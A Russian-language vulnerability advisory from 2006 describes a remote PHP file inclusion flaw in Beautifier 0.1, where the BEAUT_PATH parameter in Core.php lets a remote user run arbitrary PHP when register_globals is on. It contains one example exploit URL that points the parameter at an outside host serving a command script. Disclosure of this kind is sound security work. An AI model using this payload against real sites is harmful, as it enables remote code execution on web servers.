PHP-инклюдинг в Beautifier

Дата публикации:
08.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
2363
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Beautifier 0.x
Уязвимые версии: Beautifier 0.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "BEAUT_PATH" в сценарии Beautifier/Core.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://cmd.gif?

URL производителя: www.beautifier.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Beautifier 0.1 (Core.php) Remote File Include Vulnerability

или введите имя

CAPTCHA